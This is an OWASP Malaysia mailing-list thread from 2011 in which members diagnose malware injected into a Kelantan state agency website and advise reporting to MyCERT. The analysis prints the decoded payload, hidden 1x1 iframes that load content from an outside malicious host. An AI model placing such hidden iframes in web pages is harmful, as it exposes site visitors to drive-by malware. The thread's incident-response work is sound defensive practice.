[Owasp-Malaysia] Malware Detected!

Hazrul Hamzah hazrul at hazrulnz.net
Tue Feb 8 22:51:41 EST 2011


For Mr. Syamsuri,

The ideal situation is you have the resources (time and manpower of
course) to examine the logs yourself. In that case you can have all the
information and findings contained within your org.

The best or practical situation is for you to submit the log to mycert.
You can ask our friend Mr. Adli about the duration or any TOC of the analysis.

For an out-of-this-world, last-resort situation, maybe some of our friends
here can do the analysis for you.

Analysing logs is not that difficult if you're assisted by the right tools
(and of course know what you are looking for), and it is not that straight
to the point as well ;)

For analysis, the 4W and 1H need to be answered for the analysis to be
concluded.

Cheers
> Hi Mohd Syamsuri,
>
> you can send the access log to mycert at mycert.org.my for further analysis
> :)
>
> Thanks
>
> On 9 February 2011 10:54, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>> I am still searching for the source..
>> Last week I asked a practical student to upload images to the site...
>> After they had finished the job, uncle G blocked my site.
>> I have "quarantined" their laptop... :p
>>
>> ** Poor Malaysian IT kids. They are only taught to pass
>> exams...
>>
>> On Wed, Feb 9, 2011 at 9:45 AM, Sharuzzaman Ahmat Raslan
>> <sharuzzaman at gmail.com> wrote:
>>>
>>> Please check how the line got injected into your system.
>>>
>>> You need to find the source of the problem to make sure it will not
>>> happen again.
>>>
>>>
>>>
>>> On Wed, Feb 9, 2011 at 6:53 AM, Mohd Syamsuri <msyamsuri at gmail.com>
>>> wrote:
>>>>
>>>> Mr Adnan, thanks for the info and guide..
>>>>
>>>> I have cleaned up all the mess and the site is up and running again..
>>>>
>>>> Thanks to all too..
>>>>
>>>> ** I will blog this so others can use it as a guide...
>>>>
>>>> On Tue, Feb 8, 2011 at 6:00 PM, Adnan bin Mohd Shukor
>>>> <adnan.shukor at gmail.com> wrote:
>>>>>
>>>>> mamp <= LOL typo.. it should be nano
>>>>> js <= one of the binaries in SpiderMonkey. Get the patched version from
>>>>> http://blog.didierstevens.com/programs/spidermonkey/ and if you are
>>>>> working on MacOS/Darwin, apply this patch:
>>>>>
>>>>> http://blog.xanda.org/2010/10/15/fix-for-spidermonkey-build-issue-in-darwin/
>>>>>
>>>>> thanks
>>>>>
>>>>> On 8 February 2011 17:56, Sharuzzaman Ahmat Raslan
>>>>> <sharuzzaman at gmail.com> wrote:
>>>>> > I can see 2 interesting apps/scripts:
>>>>> >
>>>>> > 1. mamp
>>>>> > 2. /opt/analysis/js/js
>>>>> >
>>>>> > care to share? hopefully it is open source ;)
>>>>> >
>>>>> >
>>>>> > On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor
>>>>> > <adnan.shukor at gmail.com> wrote:
>>>>> >>
>>>>> >> Here is my bash history:
>>>>> >>
>>>>> >> xanda:tmp adnan$ history
>>>>> >> <snip>
>>>>> >>  500  cd /tmp
>>>>> >>  501  wget http:/www2.pkink.gov.my/indexsedc.php
>>>>> >>  502  wget http://www2.pkink.gov.my/indexsedc.php
>>>>> >>  503  nano indexsedc.php
>>>>> >>  504  wget http://www2.pkink.gov.my/indexsedc.php
>>>>> >>  505  mamp indexsedc.php.1
>>>>> >>  506  nano indexsedc.php.1
>>>>> >>  507  wget http://www2.pkink.gov.my/sedc.php
>>>>> >>  508  nano sedc.php
>>>>> >>  509  wget http://www2.pkink.gov.my/default.php
>>>>> >>  510  nano default.php
>>>>> >>  511  nano default.php
>>>>> >>  512  clear
>>>>> >> <I've removed the tags and left the clean JavaScript inside>
>>>>> >>  513  mv default.php default.txt
>>>>> >>  514  /opt/analysis/js/js < default.txt
>>>>> >>  515  cat write.log
>>>>> >>  516  history
>>>>> >> xanda:tmp adnan$
>>>>> >>
>>>>> >> Below is the output of the cat:
>>>>> >> [output]
>>>>> >> xanda:tmp adnan$ cat write.log
>>>>> >> <iframe width="1" height="1" src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"<iframe width="1" height="1" src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"
>>>>> >> [/output]
>>>>> >>
>>>>> >>
>>>>> >> Hint: you might use a modified version of SpiderMonkey to 'understand'
>>>>> >> the JavaScript
>>>>> >>
>>>>> >> Thanks
>>>>> >>
>>>>> >> On 8 February 2011 17:38, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>>>>> >> > thanks for the info..
>>>>> >> > i will check all the file.
>>>>> >> >
>>>>> >> > how did you find it?
>>>>> >> >
>>>>> >> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor
>>>>> >> > <adnan.shukor at gmail.com> wrote:
>>>>> >> >>
>>>>> >> >> Here is the flow:
>>>>> >> >>
>>>>> >> >> 1) your indexsedc.php has an iframe to sedc.php
>>>>> >> >> 2) and your sedc.php has an iframe to default.php
>>>>> >> >> 3) and in default.php (look at the last 2 lines), javascript will
>>>>> >> >> actually create an iframe to
>>>>> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>>>>> >> >>
>>>>> >> >> thanks :)
>>>>> >> >>
>>>>> >> >> On 8 February 2011 17:07, Mohd Syamsuri <msyamsuri at gmail.com>
>>>>> >> >> wrote:
>>>>> >> >> > can you point...
>>>>> >> >> > my index.htm or indexsedc.php or other file?
>>>>> >> >> >
>>>>> >> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor
>>>>> >> >> > <adnan.shukor at gmail.com> wrote:
>>>>> >> >> >>
>>>>> >> >> >> you have an iframe pointing to
>>>>> >> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>>>>> >> >> >>
>>>>> >> >> >> which is not xss :)
>>>>> >> >> >>
>>>>> >> >> >> From my personal point of view, it's either caused by:
>>>>> >> >> >> 1) malware on the PC which has been used for ftp/access to the
>>>>> >> >> >> server
>>>>> >> >> >> 2) a compromised server
>>>>> >> >> >>
>>>>> >> >> >> you can send your access.log to cyber999 at cybersecurity.my or
>>>>> >> >> >> mycert at mycert.org.my for further analysis :)
>>>>> >> >> >>
>>>>> >> >> >> thanks
>>>>> >> >> >>
>>>>> >> >> >> On 8 February 2011 16:00, Mohd Syamsuri <msyamsuri at gmail.com>
>>>>> >> >> >> wrote:
>>>>> >> >> >> > I have checked it.
>>>>> >> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy <rastaboyz at gmail.com>
>>>>> >> >> >> > wrote:
>>>>> >> >> >> >>
>>>>> >> >> >> >> Hi Mohd Syamsuri,
>>>>> >> >> >> >>
>>>>> >> >> >> >> Why don't you check on the reason why it's being blocked, it
>>>>> >> >> >> >> might help.
>>>>> >> >> >> >>
>>>>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/
>>>>> >> >> >> >>
>>>>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788
>>>>> >> >> >> >>
>>>>> >> >> >> >> Regards,
>>>>> >> >> >> >> Kishur
>>>>> >> >> >> >>
>>>>> >> >> >> >>
>>>>> >> >> >> >>
>>>>> >> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri <msyamsuri at gmail.com>
>>>>> >> >> >> >> wrote:
>>>>> >> >> >> >>>
>>>>> >> >> >> >>> Assalamualaikum and good day to my fellow friends.
>>>>> >> >> >> >>> I need some advice.
>>>>> >> >> >> >>> The web site of Perbadanan Kemajuan Iktisad Negeri Kelantan
>>>>> >> >> >> >>> (http://www.pkink.gov.my) has been blocked by Google for
>>>>> >> >> >> >>> almost 4 days.
>>>>> >> >> >> >>> It said that we host malware on our server: "Malware
>>>>> >> >> >> >>> Detected!" (Google said that!!)
>>>>> >> >> >> >>> What I did is:
>>>>> >> >> >> >>> 1. Scan all the data and upload new data
>>>>> >> >> >> >>> 2. Check the index.html or index.php
>>>>> >> >> >> >>> 3. Scan using a web scanner at
>>>>> >> >> >> >>> http://www.avgthreatlabs.com/
>>>>> >> >> >> >>> http://www.virustotal.com
>>>>> >> >> >> >>> but still get blocked..
>>>>> >> >> >> >>> Google said: Suspected injected code
>>>>> >> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php" NAME="confcontent" scrolling=yes >
>>>>> >> >> >> >>> I have been using this code for almost 2 years
>>>>> >> >> >> >>> What should I do now?
>>>>> >> >> >> >>>
>>>>> >> >> >> >>> --
>>>>> >> >> >> >>> best regard
>>>>> >> >> >> >>> syamsuri
>>>>> >> >> >> >>>
>>>>> >> >> >> >>>
>>>>> >> >> >> >>>
>>>>> >> >> >> >>> _______________________________________________
>>>>> >> >> >> >>> Owasp-Malaysia mailing list
>>>>> >> >> >> >>> Owasp-Malaysia at lists.owasp.org
>>>>> >> >> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>> >> >> >> >>>
>>>>> >> >> >> >>> OWASP Malaysia Wiki
>>>>> >> >> >> >>> http://www.owasp.org/index.php/Malaysia
>>>>> >> >> >> >>>
>>>>> >> >> >> >>> OWASP Malaysia Wiki Facebook
>>>>> >> >> >> >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>>> >> >> >> >>
>>>>> >> >> >> >
>>>>> >> >> >> >
>>>>> >> >> >> >
>>>>> >> >> >> > --
>>>>> >> >> >> > best regard
>>>>> >> >> >> > syamsuri
>>>>> >> >> >> >
>>>>> >> >> >
>>>>> >> >> >
>>>>> >> >> >
>>>>> >> >> > --
>>>>> >> >> > best regard
>>>>> >> >> > syamsuri
>>>>> >> >> >
>>>>> >> >
>>>>> >> >
>>>>> >> >
>>>>> >> > --
>>>>> >> > best regard
>>>>> >> > syamsuri
>>>>> >> >
>>>>> >
>>>>> >
>>>>> >
>>>>> > --
>>>>> > Sharuzzaman Ahmat Raslan
>>>>
>>>>
>>>>
>>>> --
>>>> best regard
>>>> syamsuri
>>>>
>>>
>>>
>>>
>>> --
>>> Sharuzzaman Ahmat Raslan
>>
>>
>>
>> --
>> best regard
>> syamsuri
>>
>



